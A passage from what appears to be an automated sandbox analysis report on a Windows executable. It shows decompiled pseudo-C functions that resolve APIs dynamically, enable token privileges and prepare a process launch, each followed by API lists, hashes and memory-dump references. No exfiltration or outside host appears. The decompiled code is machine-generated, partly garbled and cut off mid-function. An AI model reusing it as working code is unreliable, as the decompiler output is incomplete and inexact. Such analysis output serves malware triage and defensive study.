                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileNameOpenwcscpy
                                                                                      • String ID: L
                                                                                      • API String ID: 3246554996-2909332022
                                                                                      • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                      • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                      				void* __esi;
                                                                                      				_Unknown_base(*)()* _t10;
                                                                                      				void* _t12;
                                                                                      				struct HINSTANCE__** _t13;
                                                                                      
                                                                                      				_t13 = __eax;
                                                                                      				_t12 = 0;
                                                                                      				if(E00408F72(__eax) != 0) {
                                                                                      					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                      					if(_t10 != 0) {
                                                                                      						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                      					}
                                                                                      				}
                                                                                      				return _t12;
                                                                                      			}








                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: LookupAccountSidW$Y@
                                                                                      • API String ID: 190572456-2352570548
                                                                                      • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                      • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E0040AD85(intOrPtr _a4) {
                                                                                      				_Unknown_base(*)()* _t3;
                                                                                      				void* _t7;
                                                                                      				struct HINSTANCE__* _t8;
                                                                                      				char** _t9;
                                                                                      
                                                                                      				_t7 = 0;
                                                                                      				_t8 = E00405436(L"shlwapi.dll");
                                                                                      				 *_t9 = "SHAutoComplete";
                                                                                      				_t3 = GetProcAddress(_t8, ??);
                                                                                      				if(_t3 != 0) {
                                                                                      					_t7 =  *_t3(_a4, 0x10000001);
                                                                                      				}
                                                                                      				FreeLibrary(_t8);
                                                                                      				return _t7;
                                                                                      			}








                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                      • String ID: shlwapi.dll
                                                                                      • API String ID: 4092907564-3792422438
                                                                                      • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                      • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406597(wchar_t* __esi) {
                                                                                      				wchar_t* _t2;
                                                                                      				wchar_t* _t6;
                                                                                      
                                                                                      				_t6 = __esi;
                                                                                      				E00404AD9(__esi);
                                                                                      				_t2 = wcsrchr(__esi, 0x2e);
                                                                                      				if(_t2 != 0) {
                                                                                      					 *_t2 =  *_t2 & 0x00000000;
                                                                                      				}
                                                                                      				return wcscat(_t6, L"_lng.ini");
                                                                                      			}






                                                                                      APIs
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 004065A0
                                                                                      • wcscat.MSVCRT ref: 004065B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                      • String ID: _lng.ini
                                                                                      • API String ID: 383090722-1948609170
                                                                                      • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                      • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AC52() {
                                                                                      				struct HINSTANCE__* _t1;
                                                                                      				_Unknown_base(*)()* _t2;
                                                                                      
                                                                                      				if( *0x4101c4 == 0) {
                                                                                      					_t1 = E00405436(L"shell32.dll");
                                                                                      					 *0x4101c4 = _t1;
                                                                                      					if(_t1 != 0) {
                                                                                      						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                      						 *0x4101c0 = _t2;
                                                                                      						return _t2;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t1;
                                                                                      			}






                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                      • API String ID: 946536540-880857682
                                                                                      • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                      • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                      • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                      • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00406670(char** __esi, void* __eflags) {
                                                                                      				char* _t30;
                                                                                      				char** _t39;
                                                                                      
                                                                                      				_t39 = __esi;
                                                                                      				 *__esi = "cf@";
                                                                                      				__esi[0xb8] = 0;
                                                                                      				_t30 = E00404FA4(0x338, __esi);
                                                                                      				_push(0x14);
                                                                                      				__esi[0xcb] = 0;
                                                                                      				__esi[0xa6] = 0;
                                                                                      				__esi[0xb9] = 0;
                                                                                      				__esi[0xba] = 0xfff;
                                                                                      				__esi[8] = 0;
                                                                                      				__esi[1] = 0;
                                                                                      				__esi[0xb7] = 1;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_push(0x14);
                                                                                      				_t39[2] = _t30;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_push(0x14);
                                                                                      				_t39[3] = _t30;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_push(0x14);
                                                                                      				_t39[4] = _t30;
                                                                                      				L0040B26C();
                                                                                      				if(_t30 == 0) {
                                                                                      					_t30 = 0;
                                                                                      				} else {
                                                                                      					_t30[4] = 0;
                                                                                      					_t30[0x10] = 0;
                                                                                      					_t30[8] = 0;
                                                                                      					_t30[0xc] = 0x100;
                                                                                      					 *_t30 = 0;
                                                                                      				}
                                                                                      				_t39[5] = _t30;
                                                                                      				return _t39;
                                                                                      			}






                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      • API String ID: 1860491036-0
                                                                                      • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                      • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                      • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                      • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                      				int _v8;
                                                                                      				signed int _v12;
                                                                                      				void* __edi;
                                                                                      				int _t32;
                                                                                      				intOrPtr _t33;
                                                                                      				intOrPtr _t36;
                                                                                      				signed int _t48;
                                                                                      				signed int _t58;
                                                                                      				signed int _t59;
                                                                                      				void** _t62;
                                                                                      				void** _t63;
                                                                                      				signed int* _t66;
                                                                                      
                                                                                      				_t66 = __eax;
                                                                                      				_t32 = wcslen(_a4);
                                                                                      				_t48 =  *(_t66 + 4);
                                                                                      				_t58 = _t48 + _t32;
                                                                                      				_v12 = _t58;
                                                                                      				_t59 = _t58 + 1;
                                                                                      				_v8 = _t32;
                                                                                      				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                      				 *(_t66 + 4) = _t59;
                                                                                      				_t62 = _t66 + 0x10;
                                                                                      				if(_t59 != 0xffffffff) {
                                                                                      					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                      				} else {
                                                                                      					free( *_t62);
                                                                                      				}
                                                                                      				_t60 =  *(_t66 + 0x1c);
                                                                                      				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                      				_t63 = _t66 + 0xc;
                                                                                      				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                      					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                      				} else {
                                                                                      					free( *_t63);
                                                                                      				}
                                                                                      				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                      				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                      				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                      				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                      				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                      				return _t30;
                                                                                      			}
















                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 004054EC
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                        • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                        • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                        • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                      • memcpy.MSVCRT ref: 00405556
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 726966127-0
                                                                                      • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                      • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                      • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                      • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 81%
                                                                                      			E00405ADF() {
                                                                                      				void* _t25;
                                                                                      				signed int _t27;
                                                                                      				signed int _t29;
                                                                                      				signed int _t31;
                                                                                      				signed int _t33;
                                                                                      				signed int _t50;
                                                                                      				signed int _t52;
                                                                                      				signed int _t54;
                                                                                      				signed int _t56;
                                                                                      				intOrPtr _t60;
                                                                                      
                                                                                      				_t60 =  *0x41c470;
                                                                                      				if(_t60 == 0) {
                                                                                      					_t50 = 2;
                                                                                      					 *0x41c470 = 0x8000;
                                                                                      					_t27 = 0x8000 * _t50;
                                                                                      					 *0x41c474 = 0x100;
                                                                                      					 *0x41c478 = 0x1000;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c458 = _t27;
                                                                                      					_t52 = 4;
                                                                                      					_t29 =  *0x41c474 * _t52;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c460 = _t29;
                                                                                      					_t54 = 4;
                                                                                      					_t31 =  *0x41c474 * _t54;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c464 = _t31;
                                                                                      					_t56 = 2;
                                                                                      					_t33 =  *0x41c478 * _t56;
                                                                                      					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                      					L0040B26C();
                                                                                      					 *0x41c45c = _t33;
                                                                                      					return _t33;
                                                                                      				}
                                                                                      				return _t25;
                                                                                      			}














                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1033339047-0
                                                                                      • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                      • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                      				void* _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                      				void* __esi;
                                                                                      				_Unknown_base(*)()* _t16;
                                                                                      				_Unknown_base(*)()* _t18;
                                                                                      				long _t19;
                                                                                      				_Unknown_base(*)()* _t22;
                                                                                      				_Unknown_base(*)()* _t24;
                                                                                      				struct HINSTANCE__** _t35;
                                                                                      				void* _t37;
                                                                                      
                                                                                      				_t37 = __eflags;
                                                                                      				_t35 = __eax;
                                                                                      				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				_t16 = E00408F72(_t35);
                                                                                      				__eflags = _t16;
                                                                                      				if(_t16 != 0) {
                                                                                      					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                      					__eflags = _t24;
                                                                                      					if(_t24 != 0) {
                                                                                      						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				_v24.PrivilegeCount = 1;
                                                                                      				_v12 = 2;
                                                                                      				_a4 = _v8;
                                                                                      				_t18 = E00408F72(_t35);
                                                                                      				__eflags = _t18;
                                                                                      				if(_t18 != 0) {
                                                                                      					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                      					__eflags = _t22;
                                                                                      					if(_t22 != 0) {
                                                                                      						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				_t19 = GetLastError();
                                                                                      				FindCloseChangeNotification(_v8); // executed
                                                                                      				return _t19;
                                                                                      			}















                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                      • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                      • API String ID: 616250965-1253513912
                                                                                      • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                      • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                      				WCHAR* _v8;
                                                                                      				signed int _v12;
                                                                                      				int _v16;
                                                                                      				int _v20;
                                                                                      				char* _v24;
                                                                                      				int _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				int _v36;
                                                                                      				int _v40;
                                                                                      				char _v44;
                                                                                      				void* _v56;
                                                                                      				int _v60;
                                                                                      				char _v92;
                                                                                      				void _v122;
                                                                                      				int _v124;
                                                                                      				short _v148;
                                                                                      				signed int _v152;
                                                                                      				intOrPtr _v168;
                                                                                      				intOrPtr _v172;
                                                                                      				intOrPtr _v176;
                                                                                      				intOrPtr _v180;
                                                                                      				void _v192;
                                                                                      				char _v196;
                                                                                      				char _v228;
                                                                                      				void _v258;
                                                                                      				int _v260;
                                                                                      				void _v786;
                                                                                      				short _v788;
                                                                                      				void _v1314;
                                                                                      				short _v1316;
                                                                                      				void _v1842;
                                                                                      				short _v1844;
                                                                                      				void _v18234;
                                                                                      				short _v18236;
                                                                                      				char _v83772;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				short* _t174;
                                                                                      				short _t175;
                                                                                      				signed int _t176;
                                                                                      				short _t177;
                                                                                      				short _t178;
                                                                                      				int _t184;
                                                                                      				signed int _t187;
                                                                                      				intOrPtr _t207;
                                                                                      				intOrPtr _t219;
                                                                                      				int* _t252;
                                                                                      				int* _t253;
                                                                                      				int* _t266;
                                                                                      				int* _t267;
                                                                                      				wchar_t* _t270;
                                                                                      				int _t286;
                                                                                      				void* _t292;
                                                                                      				void* _t304;
                                                                                      				WCHAR* _t308;
                                                                                      				WCHAR* _t310;
                                                                                      				intOrPtr* _t311;
                                                                                      				int _t312;
                                                                                      				WCHAR* _t315;
                                                                                      				void* _t325;
                                                                                      				void* _t328;
                                                                                      
                                                                                      				_t304 = __edx;
                                                                                      				E0040B550(0x1473c, __ecx);
                                                                                      				_t286 = 0;
                                                                                      				 *_a4 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_v16 = 0;
                                                                                      				_v20 = 0;
                                                                                      				memset( &_v192, 0, 0x40);
                                                                                      				_v60 = 0;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_v24 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_v28 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v32 = 0x100;
                                                                                      				_v44 = 0;
                                                                                      				_v1316 = 0;
                                                                                      				memset( &_v1314, 0, 0x208);
                                                                                      				_v788 = 0;
                                                                                      				memset( &_v786, 0, 0x208);
                                                                                      				_t315 = _a8;
                                                                                      				_t328 = _t325 + 0x24;
                                                                                      				_v83772 = 0;
                                                                                      				_v196 = 0x44;
                                                                                      				E00404923(0x104,  &_v788, _t315);
                                                                                      				if(wcschr(_t315, 0x25) != 0) {
                                                                                      					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                      				}
                                                                                      				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                      					_v8 = _t286;
                                                                                      					_v1844 = _t286;
                                                                                      					memset( &_v1842, _t286, 0x208);
                                                                                      					_t328 = _t328 + 0xc;
                                                                                      					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                      					if(_v1844 != _t286) {
                                                                                      						E00404923(0x104,  &_v788,  &_v1844);
                                                                                      					}
                                                                                      				}
                                                                                      				_t308 =  &(_t315[0x2106]);
                                                                                      				if( *_t308 == _t286) {
                                                                                      					E00404B5C( &_v1316,  &_v788);
                                                                                      					__eflags = _v1316 - _t286;
                                                                                      					_t315 = _a8;
                                                                                      					_pop(_t292);
                                                                                      					if(_v1316 == _t286) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					_v20 = _t308;
                                                                                      					_t270 = wcschr(_t308, 0x25);
                                                                                      					_pop(_t292);
                                                                                      					if(_t270 == 0) {
                                                                                      						L11:
                                                                                      						_t174 =  &(_t315[0x220e]);
                                                                                      						if( *_t174 != 1) {
                                                                                      							_v152 = _v152 | 0x00000001;
                                                                                      							_v148 =  *_t174;
                                                                                      						}
                                                                                      						_t309 = ",";
                                                                                      						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                      							_v260 = _t286;
                                                                                      							memset( &_v258, _t286, 0x3e);
                                                                                      							_v124 = _t286;
                                                                                      							memset( &_v122, _t286, 0x3e);
                                                                                      							_v8 = _t286;
                                                                                      							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                      							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                      							_v152 = _v152 | 0x00000004;
                                                                                      							_t266 =  &_v260;
                                                                                      							_push(_t266);
                                                                                      							L0040B1F8();
                                                                                      							_v180 = _t266;
                                                                                      							_t328 = _t328 + 0x3c;
                                                                                      							_t267 =  &_v124;
                                                                                      							L0040B1F8();
                                                                                      							_t292 = _t267;
                                                                                      							_v176 = _t267;
                                                                                      						}
                                                                                      						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                      							_v260 = _t286;
                                                                                      							memset( &_v258, _t286, 0x3e);
                                                                                      							_v124 = _t286;
                                                                                      							memset( &_v122, _t286, 0x3e);
                                                                                      							_v8 = _t286;
                                                                                      							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                      							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                      							_v152 = _v152 | 0x00000002;
                                                                                      							_t252 =  &_v260;
                                                                                      							_push(_t252);
